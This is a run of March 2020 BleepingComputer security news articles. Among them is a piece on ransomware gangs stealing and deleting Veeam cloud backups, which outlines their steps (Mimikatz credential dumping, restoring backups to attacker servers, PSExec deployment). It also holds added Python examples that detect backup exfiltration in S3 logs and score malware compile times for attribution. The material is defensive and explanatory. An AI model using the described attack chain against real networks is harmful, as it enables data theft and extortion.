Ransomware Attackers Use Your Cloud Backups Against You
7.3.2020 
Bleepingcomputer   Ransomware

Backups are one of the most, if not the most, important defenses against ransomware, but if they are not configured properly, attackers will use them against you.

Recently the DoppelPaymer Ransomware operators published on their leak site the Admin user name and password for a non-paying victim's Veeam backup software.

Leaked Veeam Account
This was not meant to expose the information to others for further attacks but was used as a warning to the victim that the ransomware operators had full access to their network, including the backups.

After seeing this information, I reached out to the operators of the DoppelPaymer and Maze Ransomware families to learn how they target victim's backups and was surprised by what I learned.

It should be noted that in this article we will be focusing on the Veeam backup software. Not because it is less secure than other software, but simply because it is one of the most popular enterprise backup products and was mentioned by the ransomware operators.

Attackers first use your cloud backups to steal your data
During ransomware attacks, attackers will compromise an individual host through phishing, malware, or exposed remote desktop services.

Once they gain access to a machine, they spread laterally throughout the network until they gain access to administrator credentials and the domain controller.

Using tools such as Mimikatz, they proceed to dump credentials from Active Directory.

According to Nero Consulting, an MSP and IT Consulting company based out of New York City who assisted me with this article, this could allow the attackers to gain access to backup software as some administrators configure Veeam to use Windows authentication.

Log in to Veeam using Windows authentication
Once they gain access, the Maze Ransomware operators told BleepingComputer that if cloud backups are configured, it is very useful when stealing data from their victims.

Configured cloud provider
When Maze finds backups stored in the cloud, they attempt to obtain the cloud storage credentials and then use them to restore the victim's data to servers under the attacker's control.

"Yes, we download them. It is very useful. No need to search for sensitive information, it is definitely contained in backups. If backups in the cloud it is even easier, you just login to cloud and download it from your server, full invisibility to "data breach detection software". Clouds is about security, right?"

As the attackers are restoring directly from the cloud to their servers, it won't raise any red flags for the victim as their servers appear to be operating normally with no logs being created in their backup software.

The Maze operators did not elaborate on how they gain access to the cloud credentials, but DoppelPaymer told us they use "all possible methods".

This could include keyloggers, phishing attacks, or by reading locally saved documentation on the backup servers.

Deleting backups before ransomware attacks
Regardless of whether the backups are used to steal data, before encrypting devices on the network the attackers will first delete the backups so that they cannot be used to restore encrypted files.

DoppelPaymer told BleepingComputer that even though cloud backups can be a good option to protect against ransomware, it is not 100% effective.

"Cloud backups are a very good option against ransom but do not 100% protect as cloud backups are not always good configured, offline backups often outdated - the system of backups is really nice but human factor leaves some options," DoppelPaymer told us via email.

Because the actors have full access to the local installation of the backup software, they can simply delete any backups that exist in the cloud, unless you subscribe to service add-ons such as immutable backups.

Deleting a cloud backup in Veeam
With a victim's data now stolen and their backups deleted, the attackers deploy their ransomware throughout the compromised network using PSExec or PowerShell Empire, typically during off-hours.

This usually leads to a company opening the next day to an encrypted network.

Protecting your backups
In emails with Rick Vanover, Senior Director, Product Strategy at Veeam Software, we were told that it does not matter what software you use, once an attacker gains privileged access to the network, everything is at risk.

"We have advocated, even in a published 2017 whitepaper that I wrote I’ve recommended separate accounts for Veeam installations and components. Additionally, I recommend Veeam installations to use non-domain accounts for components as well to add more account-based layers of resiliency. Additionally, Veeam has recommended that the Veeam deployment not have Internet access or otherwise be on an isolated management network," Vanover told BleepingComputer.

To prevent ransomware attackers from gaining complete leverage over a victim, Veeam recommends that companies follow a 3-2-1 Rule when configuring backups.

"Whether it is ultra-resilient backup data like S3-immutable backups in the cloud, encrypted backups on tape or encrypted backups on removable offline storage; customers need to have multiple copies of data. We have advocated for a long time the 3-2-1 Rule, which advocates having 3 different copies of data on 2 different media with one of them being off-site. Couple in 1 copy being on an ultra-resilient technique such as an immutable backup, offline backup or otherwise air-gapped; data can be protected against nearly any failure scenario – including ransomware. Additionally, Veeam also has a technology called Secure Restore; which will perform a threat scan with almost any tool to ensure that a restored system or data does not re-introduce a threat," Vanover continued.

Like Veeam, Nero Consulting also strongly recommends that users purchase the immutable storage or redundant storage protection options, if available, when using cloud services.

Using this option, even if the data is deleted from the cloud storage provider, the immutable storage service will make the data recoverable for a certain amount of time.

As for protecting a network from data exfiltration, the best solution is to prevent the attackers from gaining access to your network in the first place and to monitor for suspicious activity.

This would include utilizing network monitoring software, intrusion detection systems, and geographic and IP access control for cloud storage providers if available.
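The article notes that a restore pulled straight from the cloud leaves nothing in the backup software's own logs, so the provider's access logs are where such activity shows up. The following Python is an added example (not from the article, Veeam, or Nero Consulting) that scans lines in the layout of S3 server access logs for successful object downloads from addresses outside an allow-list of backup-server ranges and totals the volume per outside address. The log lines, bucket and key names, IAM principal and allowed CIDR are all constructed for the example; for another provider's log format only the regular expression needs to change.

```python
import ipaddress
import re
from collections import defaultdict

# Leading fields of an S3 server access log line (later fields are ignored):
# owner bucket [time] remote-ip requester request-id operation key "request-uri" status error bytes-sent ...
LOG_RE = re.compile(
    r'^(?P<owner>\S+) (?P<bucket>\S+) \[(?P<time>[^\]]+)\] (?P<ip>\S+) (?P<requester>\S+) '
    r'(?P<reqid>\S+) (?P<op>\S+) (?P<key>\S+) "(?P<uri>[^"]*)" (?P<status>\d{3}) '
    r'(?P<error>\S+) (?P<bytes>\S+)'
)

# Constructed sample in that layout: the backup server (203.0.113.10) writes and
# restores, while an unknown address downloads four full backup files at night.
SAMPLE_LOG = """\
owner1 corp-backups [04/Mar/2020:23:05:12 +0000] 203.0.113.10 arn:aws:iam::123456789012:user/backup-svc 1EXAMPLE REST.PUT.OBJECT veeam/job1-2020-03-04.vbk "PUT /corp-backups/veeam/job1-2020-03-04.vbk HTTP/1.1" 200 - - 536870912 - - "-" "VeeamAgent/10.0" -
owner1 corp-backups [05/Mar/2020:01:40:03 +0000] 203.0.113.10 arn:aws:iam::123456789012:user/backup-svc 2EXAMPLE REST.GET.OBJECT veeam/job1-2020-03-04.vbk "GET /corp-backups/veeam/job1-2020-03-04.vbk HTTP/1.1" 200 - 536870912 536870912 - - "-" "VeeamAgent/10.0" -
owner1 corp-backups [05/Mar/2020:02:14:07 +0000] 198.51.100.77 arn:aws:iam::123456789012:user/backup-svc 3EXAMPLE REST.GET.OBJECT veeam/job1-2020-03-04.vbk "GET /corp-backups/veeam/job1-2020-03-04.vbk HTTP/1.1" 200 - 536870912 536870912 - - "-" "aws-cli/1.18.0" -
owner1 corp-backups [05/Mar/2020:02:21:44 +0000] 198.51.100.77 arn:aws:iam::123456789012:user/backup-svc 4EXAMPLE REST.GET.OBJECT veeam/job2-2020-03-04.vbk "GET /corp-backups/veeam/job2-2020-03-04.vbk HTTP/1.1" 200 - 1073741824 1073741824 - - "-" "aws-cli/1.18.0" -
owner1 corp-backups [05/Mar/2020:02:35:19 +0000] 198.51.100.77 arn:aws:iam::123456789012:user/backup-svc 5EXAMPLE REST.GET.OBJECT veeam/fileshare-2020-03-04.vbk "GET /corp-backups/veeam/fileshare-2020-03-04.vbk HTTP/1.1" 200 - 2147483648 2147483648 - - "-" "aws-cli/1.18.0" -
owner1 corp-backups [05/Mar/2020:02:50:02 +0000] 198.51.100.77 arn:aws:iam::123456789012:user/backup-svc 6EXAMPLE REST.GET.OBJECT veeam/sql-2020-03-04.vbk "GET /corp-backups/veeam/sql-2020-03-04.vbk HTTP/1.1" 200 - 1073741824 1073741824 - - "-" "aws-cli/1.18.0" -
owner1 corp-backups [05/Mar/2020:03:02:55 +0000] 198.51.100.77 arn:aws:iam::123456789012:user/backup-svc 7EXAMPLE REST.GET.OBJECT veeam/job3-2020-03-04.vbk "GET /corp-backups/veeam/job3-2020-03-04.vbk HTTP/1.1" 403 AccessDenied - - - - "-" "aws-cli/1.18.0" -
"""

ALLOWED_SOURCES = ["203.0.113.0/24"]  # constructed: the backup servers' egress range


def detect_external_downloads(log_text, allowed_cidrs):
    """Group successful object downloads by source address outside the allow-list
    and return one finding per address, largest volume first."""
    nets = [ipaddress.ip_network(c) for c in allowed_cidrs]
    per_ip = defaultdict(lambda: {"objects": 0, "bytes": 0, "keys": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["op"] != "REST.GET.OBJECT" or m["status"] != "200":
            continue  # not a completed download (uploads, listings, denied requests)
        ip = ipaddress.ip_address(m["ip"])
        if any(ip in net for net in nets):
            continue  # expected source: the backup servers themselves
        stats = per_ip[m["ip"]]
        stats["objects"] += 1
        stats["bytes"] += int(m["bytes"]) if m["bytes"].isdigit() else 0
        stats["keys"].append(m["key"])
    findings = [{"ip": ip, **stats} for ip, stats in per_ip.items()]
    return sorted(findings, key=lambda f: f["bytes"], reverse=True)


if __name__ == "__main__":
    for f in detect_external_downloads(SAMPLE_LOG, ALLOWED_SOURCES):
        print(f"{f['ip']}: {f['objects']} objects, {f['bytes'] / 2**30:.1f} GiB", f["keys"])
```

The same credentials are used by both sources in the sample, which is the point: once the backup account is stolen, only the origin address and the volume distinguish a legitimate restore from exfiltration, so the allow-list belongs in the bucket policy as well as in the monitoring rule.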


Microsoft Releases March 2020 Office Updates With Fixes, Improvements
7.3.2020 
Bleepingcomputer   Vulnerability

Microsoft released the March 2020 non-security Microsoft Office updates with improvements and fixes for the Windows Installer (MSI) editions of Office 2013 and Office 2016.

For instance, this month's updates fix a Microsoft Office 2016 error caused by ADODB.Recordset objects, update some translations, and fix an issue that prevents Skype for Business users from stopping HID devices from ringing when certain conditions are met.

Today's Office updates are available for download via Microsoft's Update service or from the Download Center for manual installation.

Depending on the update you want to install, you might also be required to have previous updates such as a Service Pack installed on your devices, as is the case with the Microsoft Office 2013 update, which requires Microsoft Office 2013 Service Pack 1.

March 2020 Office non-security updates
Some of the Office March non-security updates listed below only apply to certain programs like Skype for Business. Other updates are designed to add improvements or fix issues affecting the entire suite of Microsoft Office 2016 apps.

Additionally, these non-security Microsoft Office updates do not apply to the Click-to-Run versions of the Office apps, like Microsoft Office 365 Home.

The list of updates and the Office product they apply to is available below.

Office 2016
Product                                          Knowledge Base article
Microsoft Office 2016                            KB4484247
Microsoft Office 2016 Language Interface Pack    KB4484136
Skype for Business 2016                          KB4484245

Office 2013
Product                                          Knowledge Base article
Skype for Business 2015                          KB4484097
Some Office updates require a system reboot
Before installing the March 2020 non-security Microsoft Office updates, it's important to mention that a computer restart might also be needed to complete the update's installation process.

If your Office installation starts misbehaving, you can remove the offending update using these steps:

• Go to Start, enter View Installed Updates in the Search Windows box, and then press Enter.
• In the list of updates, locate and select the offending update, and then select Uninstall.


UK NCSC Releases Tips on Securing Smart Security Cameras
7.3.2020 
Bleepingcomputer   BigBrothers

The UK National Cyber Security Centre (NCSC) has released guidance on how to correctly set up smart security cameras and baby monitors to avoid having them hacked by attackers.

This new guidance was released because so-called smart security cameras and baby monitors can put your security and privacy at risk if not configured properly.

Such devices make it possible to watch a live camera feed over the Internet, receive activity alerts when you're not around the house, and even record surveillance footage for reviewing later in case of any incidents.

By taking the steps detailed by the NCSC, users of such devices can avoid being the victim of threat actors looking to compromise them.

Change your devices' default passwords
"Smart cameras (the security cameras and baby monitors used to monitor activity in and around your house) usually connect to the internet using your home Wi-Fi," the NCSC says. "Live feeds or images from smart cameras can (in rare cases) be accessed by unauthorized users, putting your privacy at risk," the NCSC adds.

"This is possible because smart cameras are often configured so that you can access them whilst you're away from home."

The most important measure you can take to secure your smart security cameras is to change your devices' default passwords to prevent cybercriminals from gaining access via built-in default passwords seeing that many of them come with easy to guess

If not changed, criminals could access a smart security camera or a baby monitor remotely after guessing the default password and watch you or your kid via live video.

To defend against such an attack, the NCSC recommends replacing the default password your device ships with by a strong passphrase built from three random words that you can easily remember.

The FBI also recommends using passphrases that combine several words to obtain long and easy to remember passwords that are also harder to crack by an attacker.

Keep security cameras up to date, disable unneeded remote view
The NCSC also advises security camera users to always update their software and, if such an option is available, to enable automatic software updates.

This keeps the devices up to date at all times without having to look for new software releases manually.

"Using the latest software will not only improve your security, it often adds new features," the NCSC says. "Note that the software that runs your camera is sometimes referred to as firmware, so look for the words update, firmware or software within the app."

The new guidance also recommends disabling Internet access to the smart security camera if you don't use the feature allowing for viewing camera footage remotely.

"Note that doing this may also prevent you receiving alerts when movement is detected, and could stop the camera working with smart home devices (such as Alexa, Google Home or Siri)," the NCSC adds.

UK government plans to strengthen IoT security
This guidance was released following UK government plans for strengthening the security of internet-connected products that were outlined in late January.

The new law aims to impose the following requirements on manufacturers of Internet-enabled IoT devices:

• All consumer internet-connected device passwords must be unique and not resettable to any universal factory setting
• Manufacturers of consumer IoT devices must provide a public point of contact so anyone can report a vulnerability and it will be acted on in a timely manner
• Manufacturers of consumer IoT devices must explicitly state the minimum length of time for which the device will receive security updates at the point of sale, either in store or online
In related news, Ring announced the roll-out of mandatory two-factor authentication (2FA) to all user accounts to boost security cameras' security, after a stream of incidents where attackers terrified homeowners and their children by speaking to them over their Ring devices' speakers following a series of credential stuffing attacks targeting Ring cameras.


German BSI Tells Local Govt Authorities Not to Pay Ransoms
7.3.2020 
Bleepingcomputer   BigBrothers

BSI, Germany's federal cybersecurity agency, recommends that local governments and municipal institutions not pay the ransoms demanded by attackers after being hit by ransomware attacks.

Germany's Federal Office for Information Security (aka BSI, short for Bundesamt für Sicherheit in der Informationstechnik) in collaboration with the Federal Criminal Police Office (BKA) also issued recommendations for local authorities on how to deal with ransom demands following an increasing number of such attacks.

Local authorities advised not to respond to extortionists
The presidents of the German City Council, the German District Council, and the German Association of Cities and Municipalities also issued a joint statement in support of BSI's recommendation.

"We must not give in to such ransom demands. It must be clear that municipal administrations cannot be blackmailed," they said. "Otherwise, criminals will be offered incentives to continue their actions. The attitude of our administrations must be crystal-clear and non-negotiable."

"Every attempt at extortion must be consistently reported and followed up. A zero-tolerance policy must apply to such attacks on the functionality of municipal services, the data of citizens and their tax money."

BKA President Holger Münch also said that local authorities impacted by ransomware attacks should never respond to ransom requests to avoid supporting the extortionists' 'business model'.

Münch recommended taking precautions for timely systematic prevention, detection, and response to such attacks and to report any ransomware-related incidents to the appropriate authorities.

"The best protection against ransom demands from cybercriminals is consistently implemented IT security measures," BSI President Arne Schönbohm added. "Effective emergency management can decisively minimize the effects of a cyber attack. The BSI is also happy to provide municipalities with advice."

The BSI provides government agencies and privately-held organizations with detailed guidance on how to defend against and respond to ransomware attacks, as well as first aid info in the event of serious IT security incidents.

Previous recommendations not to pay ransoms
In October 2019, the FBI Internet Crime Complaint Center (IC3) also issued a public service announcement targeted at public and private U.S. organizations about the increasing number of high-impact ransomware attacks.

"Since early 2018, the incidence of broad, indiscriminate ransomware campaigns has sharply declined, but the losses from ransomware attacks have increased significantly, according to complaints received by IC3 and FBI case information," the IC3 said at the time.

"Although state and local governments have been particularly visible targets for ransomware attacks, ransomware actors have also targeted health care organizations, industrial companies, and the transportation sector."

The FBI urged both individuals and organizations that had their systems encrypted by ransomware not to pay the ransoms requested by the extortionists behind the attacks and, instead, to contact the FBI's field offices and report the attacks to IC3 as soon as possible.

The agency advised U.S. organizations targeted by a heavy barrage of ransomware attacks to take the following defensive measures:

• Regularly back up data and verify its integrity
• Focus on awareness and training
• Patch the operating system, software, and firmware on devices
• Enable anti-malware auto-update and perform regular scans
• Implement the least privilege for file, directory, and network share permissions
• Disable macro scripts from Office files transmitted via email
• Implement software restriction policies and controls
• Employ best practices for use of RDP
• Implement application whitelisting
• Implement physical and logical separation of networks and data for different org units
• Require user interaction for end-user apps communicating with uncategorized online assets
Prevention is the new target
Taking measures to block ransomware operators from infiltrating their networks is even more important now that harvesting victims' data before encrypting systems has surfaced as the latest extortion method.

Once the data gets stolen, the ransomware gangs start threatening to leak the stolen data in small batches as leverage to pressure their victims into giving in and paying the ransoms.

This trend was initially started by Maze Ransomware in November 2019 and it was later adopted by operators of other ransomware families such as Sodinokibi, Nemty Ransomware, and BitPyLock.

Sodinokibi (aka REvil) also shared plans to email stock exchanges like NASDAQ in order to hurt the stock valuation of the publicly traded companies they compromise.

"Ransomware is not about encrypting data. It is the _current_ implementation of a methodology that coerces the victim to act as an agent for the criminal (typically to acquire BTC)," as security researcher thegrugq said three years ago. "Encrypting data just an implementation detail; it’s the 'coerced agent' part that matters."

RailWorks Corporation, one of North America's leading railroad track providers, was the first to disclose a data breach following a ransomware attack last week, showing that ransomware attacks should now also be considered data breaches, with all that this entails, including potential fines.


Chinese Security Firm Says CIA Hackers Attacked China Since 2008
7.3.2020 
Bleepingcomputer   BigBrothers

Chinese security vendor Qihoo 360 says that the US Central Intelligence Agency (CIA) has hacked Chinese organizations for the last 11 years, targeting various industry sectors and government agencies.

Qihoo 360 claims in a report that lacks any technical details that "the CIA hacking group (APT-C-39)" has targeted a multitude of Chinese companies between September 2008 and June 2019, with a focus on "aviation organizations, scientific research institutions, petroleum industry, Internet companies, and government agencies."

"We speculate that in the past eleven years of infiltration attacks, CIA may have already grasped the most classified business information of China, even of many other countries in the world," Qihoo 360's report says.

"It does not even rule out the possibility that now CIA is able to track down the real-time global flight status, passenger information, trade freight and other related information.

"If the guess is true, what unexpected things will CIA do if it has such confidential and important information? Get important figures' travel itinerary, and then pose political threats, or military suppression?"

Targeted Chinese areas
APT-C-39 used CIA and NSA attack tools
The Chinese security firm also says that its researchers connected the APT-C-39 hacking campaigns to the CIA based on malware used during the attacks spanning over 11 years, including the Fluxwire backdoor and the Grasshopper malware builder.

Documentation info on these tools was leaked by WikiLeaks in March 2017, with the leak site saying at the time it also had "the majority of its [CIA's] hacking arsenal including malware, viruses, trojans, weaponized 'zero day' exploits, malware remote control systems and associated documentation."

Qihoo 360 found that "the technical details of most samples of the APT-C-39 are consistent with the ones described in the Vault 7 documents" and that "before the Vault 7 cyber weapon was disclosed by WikiLeaks, the APT-C-39 already used relevant cyber weapons against targets in China."

Additionally, the Chinese security outfit claims that the APT-C-39 hacking campaigns also used tools connected with the US National Security Agency (NSA). The Chinese researchers were able to detect the WISTFULTOOL data exfiltration plugin used "in an attack against a large Internet company in China in 2011."

The compilation times of APT-C-39's tools also place the group in U.S. time zones, according to Qihoo 360, since "the compilation time of the captured samples is in line with the North American business working hours."

APT-C-39 compilation times
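The compile-time reasoning above is a standard, if weak, attribution signal, and it can be reproduced from a sample set. The following Python is an added example (not Qihoo 360's tooling and not from the report) that reads the COFF TimeDateStamp from PE headers and scores candidate fixed UTC offsets by the share of build times that fall on Monday to Friday working hours. The PE headers are constructed in the code so it runs offline, daylight-saving shifts are ignored, and the 09:00 to 18:00 working window is this example's own assumption; as the output shows, the method yields a band of neighbouring offsets rather than a single zone, which is why it is corroborating evidence and not proof.

```python
import struct
from datetime import datetime, timedelta, timezone


def pe_timestamp(data):
    """Return the COFF header TimeDateStamp (seconds since 1970, UTC) of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    return struct.unpack_from("<I", data, e_lfanew + 8)[0]


def fake_pe(ts):
    """Constructed minimal PE header carrying the given timestamp (test input only)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE signature right after the DOS header
    return bytes(dos) + b"PE\0\0" + struct.pack("<HHI", 0x14C, 1, ts)


def business_hours_fraction(timestamps, utc_offset_hours, start=9, end=18):
    """Share of timestamps that fall Mon-Fri between `start` and `end` o'clock when
    read in a fixed UTC offset (DST deliberately ignored in this example)."""
    if not timestamps:
        return 0.0
    tz = timezone(timedelta(hours=utc_offset_hours))
    hits = 0
    for ts in timestamps:
        local = datetime.fromtimestamp(ts, tz)
        if local.weekday() < 5 and start <= local.hour < end:
            hits += 1
    return hits / len(timestamps)


def rank_offsets(images, offsets=range(-12, 15)):
    """Map each candidate UTC offset to its working-hours score for a set of PE images."""
    stamps = [pe_timestamp(img) for img in images]
    return {off: business_hours_fraction(stamps, off) for off in offsets}


def best_offsets(images):
    """Offsets that tie for the highest score (a contiguous band is the usual result)."""
    scores = rank_offsets(images)
    top = max(scores.values())
    return sorted(off for off, score in scores.items() if score == top)


# Constructed sample: builds during US-Eastern working hours (UTC-5, fixed offset)
# across a working week in June 2011, plus one Saturday build.
_EASTERN = timezone(timedelta(hours=-5))
SAMPLE_TIMESTAMPS = [
    int(datetime(2011, 6, d, h, m, tzinfo=_EASTERN).timestamp())
    for d, h, m in [(13, 15, 30), (14, 9, 30), (14, 11, 0), (15, 14, 15),
                    (16, 16, 45), (17, 10, 5), (18, 13, 0)]
]
SAMPLE_IMAGES = [fake_pe(ts) for ts in SAMPLE_TIMESTAMPS]

if __name__ == "__main__":
    for off, score in rank_offsets(SAMPLE_IMAGES).items():
        print(f"UTC{off:+d}: {score:.2f}")
    print("best fit:", best_offsets(SAMPLE_IMAGES))
```

Timestamps can be zeroed or forged by the builder, so on real samples this should be run only on sets large enough for a pattern to emerge and read alongside other indicators.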

CIA hackers also tracked by other security firms
Qihoo 360 is not the only security vendor tracking CIA hacking campaigns, with Kaspersky and Symantec also having previously labeled them as Lamberts and Longhorn, respectively.

While Kaspersky researchers have been monitoring CIA hacking activities since 2008 (matching Qihoo 360's claims), Symantec's monitoring data goes back to at least 2011 and highlights 40 compromised targets in roughly 16 countries, across various industry sectors in the Middle East, Europe, Asia, and Africa.

The CIA hackers were also named as the ones behind attacks on domestic Chinese aviation companies from late 2018 by the Chinese cybersecurity group Qi-Anxin in a report from September 2019, as reported by ZDNet.

Qi-Anxin's researchers, just like their Qihoo 360 counterparts, made the connection to the CIA hacking groups after spotting the Fluxwire backdoor being used during the attack.

Qihoo 360's report was published after two Chinese nationals were charged yesterday by the US Dept of Justice and sanctioned by the US Treasury for allegedly laundering over $100 million worth of cryptocurrency for North Korean actors known as Lazarus Group.


SETI@home Search for Alien Life Project Shuts Down After 21 Years
7.3.2020 
Bleepingcomputer   IT

SETI@home has announced that they will no longer be distributing new work to clients starting on March 31st as they have enough data and want to focus on completing their back-end analysis of the data.

SETI@home is a distributed computing project where volunteers contribute their CPU resources to analyze radio data from the Arecibo radio telescope in Puerto Rico and the Green Bank Telescope in West Virginia for signs of extraterrestrial intelligence (SETI).

Run by the Berkeley SETI Research Center since 1999, SETI@home has been a popular project where people from all over the world have been donating their CPU resources to scan small chunks of data, or "jobs", for interesting radio transmissions or anomalies. The results are then sent back to the researchers for analysis.

SETI@home
In an announcement posted yesterday, the project stated that they will no longer send data to SETI@home clients starting on March 31st, 2020 as they have reached a "point of diminishing returns" and have analyzed all the data that they need for now.

Instead, they want to focus on analyzing the back-end results in order to publish a scientific paper.

"It's a lot of work for us to manage the distributed processing of data. We need to focus on completing the back-end analysis of the results we already have, and writing this up in a scientific journal paper," their news announcement stated.

Users who wish to continue to run the SETI@home client may do so, but will not receive any new work until the project decides whether they wish to start sending work to clients again.

For those who wish to donate their CPU resources, SETI@home suggests users select another BOINC project that also supports distributed computing.


Cisco Offering Free 90-day Webex Licenses Due to Coronavirus
7.3.2020 
Bleepingcomputer   IT

To make it easier for those who are impacted by the spread of Coronavirus/COVID-19, Cisco has enhanced its free Webex account offerings and is offering free 90-day business licenses.

To reduce the potential for community spread of the Coronavirus inside and outside of the workplace, some companies are requiring employees to work remotely after international travel.

Other companies, such as Twitter, are asking employees to work remotely if possible, even if they are not in areas currently impacted by the virus.

"Beginning today, we are strongly encouraging all employees globally to work from home if they’re able. Our goal is to lower the probability of the spread of the COVID-19 coronavirus for us - and the world around us. We are operating out of an abundance of caution and the utmost dedication to keeping our Tweeps healthy," Twitter stated in a blog post.

To aid those impacted by Coronavirus, Cisco has enhanced its free Webex accounts to have additional features that make it easier to work from home.

Previously, free Cisco Webex accounts allowed you to host meetings with up to 50 participants for 40 minutes.

With the new offering, free accounts can now host meetings with up to 100 participants and for an unlimited amount of time. They are also offering toll dial-in numbers in addition to their normal VoIP capabilities.

"Effective immediately, we've expanded the capabilities on our free Webex offer in all countries where it is available, not only those impacted by COVID-19," Cisco stated in a new support article.

For businesses, Cisco is also offering free 90-day licenses through partners and the Cisco sales team.

"Additionally, through our partners and the Cisco sales team, we are providing free 90-day licenses to businesses who are not Webex customers in this time of need. We’re also helping existing customers meet their rapidly changing needs as they enable a much larger number of remote workers by expanding their usage at no additional cost."

These free Webex accounts are available in the following countries:

Australia, Austria, Belgium, Brazil, Bulgaria, Canada, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Gibraltar, Greece, Hong Kong, Hungary, India, Indonesia, Ireland, Israel, Italy, Japan, Latvia, Lithuania, Luxembourg, Macau, Malaysia, Malta, Mexico, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Singapore, Slovakia, Slovenia, South Africa, South Korea, Spain, Sweden, Switzerland, Taiwan, Thailand, UAE (United Arab Emirates), Ukraine, United Kingdom, United States, and Vietnam.

For those who want to take advantage of this offer, you can sign up for your free Webex account here.


Nemty Ransomware Punishes Victims by Posting Their Stolen Data
7.3.2020 
Bleepingcomputer   Ransomware

The Nemty Ransomware is the latest cybercrime operation to create a data leak site to punish victims who refuse to pay ransoms.

In 2019, ransomware operators began to use the concerning tactic of stealing victim's files before encrypting computers and then publicly posting these files if the victim does not pay.

The stealing and publishing of stolen data, which in many cases includes company financials, personal information of employees, and client data, automatically escalated these ransomware attacks into data breaches.

Once Maze Ransomware followed through with their threat and posted stolen files, other ransomware families such as DoppelPaymer and Sodinokibi started to launch leak sites to extort victims in a similar manner.

In a new site shared with BleepingComputer by Damien, the Nemty Ransomware operators have started to punish their non-paying victims by releasing files that were stolen before devices were encrypted.

Nemty Leak Site
This blog currently lists a single victim, an American footwear company, and contains a link to 3.5 Gigabytes of files that were allegedly stolen from the company.

As more ransomware operators begin to utilize this extortion tactic, victims will need to consider all ransomware attacks a data breach. This means filing notices with the government, alerting affected people, and sending out breach notifications.

The attackers are hoping that these extra costs and the potential reputation hit may push some victims into paying a ransom.

BleepingComputer has contacted the listed company to confirm if this is indeed their data but has not heard back at this time.


US Charges Two With Laundering $100M for North Korean Hackers
7.3.2020 
Bleepingcomputer   BigBrothers

Two Chinese nationals were charged today by the US Dept of Justice and sanctioned by the US Treasury for allegedly laundering over $100 million worth of cryptocurrency out of the nearly $250 million stolen by North Korean actors known as Lazarus Group after hacking a cryptocurrency exchange in 2018.

According to a Department of Justice (DoJ) press release, 田寅寅 aka Tian Yinyin, and 李家东 aka Li Jiadong, were charged with operating an unlicensed money transmitting business and money laundering conspiracy.

$300 million worth of crypto stolen by Lazarus Group
The almost $250 million worth of virtual currency their North Korean co-conspirators were able to steal after hacking into an unnamed virtual currency exchange was "laundered through hundreds of automated cryptocurrency transactions aimed at preventing law enforcement from tracing the funds."

"In April 2018, an employee of the exchange unwittingly downloaded DPRK-attributed malware through an email, which gave malicious cyber actors remote access to the exchange and unauthorized access to customers’ personal information, such as private keys used to access virtual currency wallets stored on the exchange’s servers," the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) explained.

"Lazarus Group cyber actors used the private keys to steal virtual currencies ($250 million dollar equivalent at date of theft) from this exchange, accounting for nearly half of the DPRK’s estimated virtual currency heists that year."

The North Korean hackers are also tied to the theft of another roughly $48.5 million worth of cryptocurrency from a South Korea-based exchange in November 2019.

In April 2018, the Lazarus Group leveraged previously used malware code from the now-defunct cryptocurrency application Celas Trade Pro — software both developed and offered by the Lazarus Group registered website called Celas Limited. Creating illegitimate websites and malicious software to conduct phishing attacks against the virtual currency sector is a pattern previously seen from North Korean cybercriminals. - OFAC

Crypto converted into Chinese yuan and Apple gift cards
Tian and Li received $91 million from DPRK-controlled accounts as the first batch of currency to launder in April 2018 and an additional $9.5 million after the Lazarus Group actors hacked a second exchange. The defendants then transferred these funds among virtual currency addresses they controlled to obfuscate their origin.

From December 2017 up until around April 2019, Tian and Li have purportedly laundered more than $100 million worth of cryptocurrency, primarily sourced from Lazarus Group's virtual currency exchange hacks.

Flow of laundered cryptocurrency funds
"The civil forfeiture complaint specifically names 113 virtual currency accounts and addresses that were used by the defendants and unnamed co-conspirators to launder funds," the DoJ added. "The forfeiture complaint seeks to recover the funds, a portion of which has already been seized."

"The two defendants operated through independent as well as linked accounts and provided virtual currency transmission services for a fee for customers," the OFAC added. "As a result of today’s action, all property and interests in property of these individuals that are in the United States or in the possession or control of U.S. persons must be blocked and reported to OFAC."

"The August 2019 UN Security Council 1718 Committee Panel of Experts report estimates that North Korea had attempted to steal as much as $2 billion, of which $571 million is attributed to cryptocurrency theft. This revenue allows the North Korean regime to continue to invest in its illicit ballistic missile and nuclear programs."

While the DoJ and OFAC haven't named the two hacked crypto exchanges, the two press releases hint at potential connections to Lazarus Group campaigns detected and reported by Kaspersky in 2018 and 2020.


Microsoft MVP Summit Now A Virtual Conf Over Coronavirus Fears
7.3.2020 
Bleepingcomputer   Security

Microsoft has decided to change its annual in-person MVP Summit held in Seattle, Washington into a virtual online conference over concerns about the continuing spread of the Coronavirus outbreak.

Every year Microsoft invites the members of their Microsoft MVP program to an MVP Summit in Seattle where members can meet their peers, interact with employees, and take part in sessions about Microsoft products.

For those who are active members of the Microsoft MVP community, the Summit is something to be looked forward to and a lot of fun for the attendees.

Scheduled for March 16th through the 20th, this year's in-person MVP Summit has been canceled over concerns about the Coronavirus and is being turned into a virtual online conference.

"In light of recent developments globally and the growing concerns around the spread of the COVID-19 virus, Microsoft has decided that this year’s MVP/ Regional Director Summit will be an online-only / virtual event. It will be scheduled for the same week (Mar 16-20)," an email sent to Microsoft MVPs stated.

For those who have registered, Microsoft will be providing further updates soon.


Windows 10 Y3K Bug: Won't Install After January 18, 3001
7.3.2020 
Bleepingcomputer   OS

A bizarre bug could affect some Windows 10 users that try to install the latest Windows release on computers where the BIOS date is set to January 19, 3001, or later on AMD or Intel motherboards.

"It seems if your motherboard BIOS (AMD or Intel) allows you to set a date of 1-19-3001 or beyond, Windows 10 1909 will not finish installing, but locks up during the second reboot of the installation process," as Carey Holzman, an IT professional and YouTuber focusing on computer enthusiasts, told BleepingComputer.

"Furthermore, if the BIOS date is changed, and you restart the computer in an attempt to complete the install of Windows 10, guess what happens next?"

